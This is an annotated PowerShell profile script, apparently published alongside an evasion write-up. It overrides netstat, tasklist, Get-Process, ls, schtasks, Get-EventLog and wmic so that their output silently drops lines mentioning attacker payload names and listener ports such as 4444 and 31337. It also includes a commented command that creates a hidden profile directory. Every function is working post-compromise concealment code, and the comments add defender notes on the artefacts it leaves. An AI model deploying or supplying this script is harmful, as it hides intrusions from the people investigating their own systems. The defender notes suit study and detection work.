Created
August 26, 2020 23:09
PowerShell profile.ps1 for evading Netstat, Tasklist, Get-EventLog, Schtasks, etc
# write-up: https://null-byte.com/powershell-evasion-0329395/
# create the profile.ps1 directory if it doesn't exist
# cd $env:USERPROFILE;$d="Documents\WindowsPowerShell\";New-Item -ItemType Directory -Name "$d";$h=Get-Item "$d";$h.Attributes="Hidden"
#
# How this profile works: each function below re-defines a command name
# (netstat, tasklist, Get-Process, ...) so the function, not the real command,
# runs when that name is typed in a session that loaded this profile. Every
# function runs the real command in a child "powershell.exe -NoProfile" (which
# does not load this file, so the override does not recurse) and pipes the
# text output through Select-String -notmatch with the patterns below, dropping
# any line that mentions an excluded name or port.
#
# Defender notes (the artefacts this technique leaves behind):
#  - a hidden Documents\WindowsPowerShell\profile.ps1 containing these overrides;
#    in an affected session "Get-Command netstat" reports CommandType Function
#    instead of Application, and the same holds for the other names below
#  - every filtered command spawns a child powershell.exe with "-NoProfile -c",
#    which appears in process-creation telemetry
#  - the overrides do not apply when the shell is started with -NoProfile or
#    when an executable is invoked by its full path (no function below has such a name)

# processes and filenames to exclude, pipe separated. e.g., payload.exe, evil.dll, tokyoneon.ps1
# Used as a regex alternation by Select-String -notmatch below; it is a substring
# match, so "evil" also drops lines containing e.g. "evil2.dll".
$excludeFiles = "payload|evil|tokyoneon"
# listening ports and PIDs to exclude
# Also a substring regex: "4444" drops any line containing 4444 (e.g. PID 14444).
$excludePorts = "4444|1337|31337|55555"
# Shadows "netstat": runs the real netstat.exe in a child powershell.exe started
# with -NoProfile (so this override is not loaded there) and drops every output
# line matching the $excludePorts regex. Callers receive Select-String MatchInfo
# objects, not netstat's raw text stream — a visible difference from the real tool.
function netstat { powershell.exe -NoProfile -c "netstat.exe $args" | Select-String -notmatch "$excludePorts" }
# Same override registered under the explicit "netstat.exe" name, so typing the
# .exe form is filtered as well. Invoking the binary by full path is not covered.
function netstat.exe { powershell.exe -NoProfile -c "netstat.exe $args" | Select-String -notmatch "$excludePorts" }
# Shadows the Get-Process cmdlet. The child shell's output is text, filtered by
# Select-String against $excludeFiles, so callers receive MatchInfo objects
# rather than Process objects — "Get-Process | Get-Member" in an affected
# session exposes the override.
function Get-Process { powershell.exe -NoProfile -c "Get-Process $args" | Select-String -notmatch "$excludeFiles" }
# Shadows "ps" with the same filter as Get-Process. NOTE(review): "ps" is a
# built-in alias of Get-Process and aliases resolve before functions, so in a
# default session this name presumably resolves through the alias to the
# Get-Process override instead of this function — verify.
function ps { powershell.exe -NoProfile -c "ps $args" | Select-String -notmatch "$excludeFiles" }
# Shadows "tasklist": runs tasklist.exe in a -NoProfile child shell and drops
# every output line matching the $excludeFiles regex (substring match on the
# whole line, including image name and any column containing those words).
function tasklist { powershell.exe -NoProfile -c "tasklist.exe $args" | Select-String -notmatch "$excludeFiles" }
# Same override under the explicit "tasklist.exe" name; a full-path invocation
# of the binary is not covered by this function name.
function tasklist.exe { powershell.exe -NoProfile -c "tasklist.exe $args" | Select-String -notmatch "$excludeFiles" }
# Shadows "ls" so directory listings drop lines matching $excludeFiles.
# NOTE(review): "ls" is a built-in alias of Get-ChildItem and aliases resolve
# before functions, so this likely resolves through the alias to the
# Get-ChildItem override instead — verify.
function ls { powershell.exe -NoProfile -c "ls $args" | Select-String -notmatch "$excludeFiles" }
# Shadows the Get-ChildItem cmdlet: listings come back as Select-String
# MatchInfo text with lines matching $excludeFiles removed, not as
# FileInfo/DirectoryInfo objects — "Get-ChildItem | Get-Member" reveals this.
function Get-ChildItem { powershell.exe -NoProfile -c "Get-ChildItem $args" | Select-String -notmatch "$excludeFiles" }
# Shadows "schtasks": runs schtasks.exe in a -NoProfile child shell and drops
# output lines matching $excludeFiles (task names or paths containing those words).
function schtasks { powershell.exe -NoProfile -c "schtasks.exe $args" | Select-String -notmatch "$excludeFiles" }
# Same override under the explicit "schtasks.exe" name; full-path invocation
# of the binary is not covered.
function schtasks.exe { powershell.exe -NoProfile -c "schtasks.exe $args" | Select-String -notmatch "$excludeFiles" }
# Shadows the Get-EventLog cmdlet and filters on both pattern sets, so any
# event line containing an excluded name or an excluded port/PID string is
# dropped. Output is MatchInfo text rather than EventLogEntry objects.
function Get-EventLog { powershell.exe -NoProfile -c "Get-EventLog $args" | Select-String -notmatch "$excludeFiles|$excludePorts" }
# Shadows "wmic": runs wmic.exe in a -NoProfile child shell, drops lines
# matching either pattern set, then ("?" is the Where-Object alias) discards
# blank lines so the gaps left by removed rows are not obvious.
function wmic { powershell.exe -NoProfile -c "wmic.exe $args" | Select-String -notmatch "$excludeFiles|$excludePorts" | ?{$_ -ne ""} }
# Same override under the explicit "wmic.exe" name (both patterns, blank lines
# removed); full-path invocation of the binary is not covered.
function wmic.exe { powershell.exe -NoProfile -c "wmic.exe $args" | Select-String -notmatch "$excludeFiles|$excludePorts" | ?{$_ -ne ""} }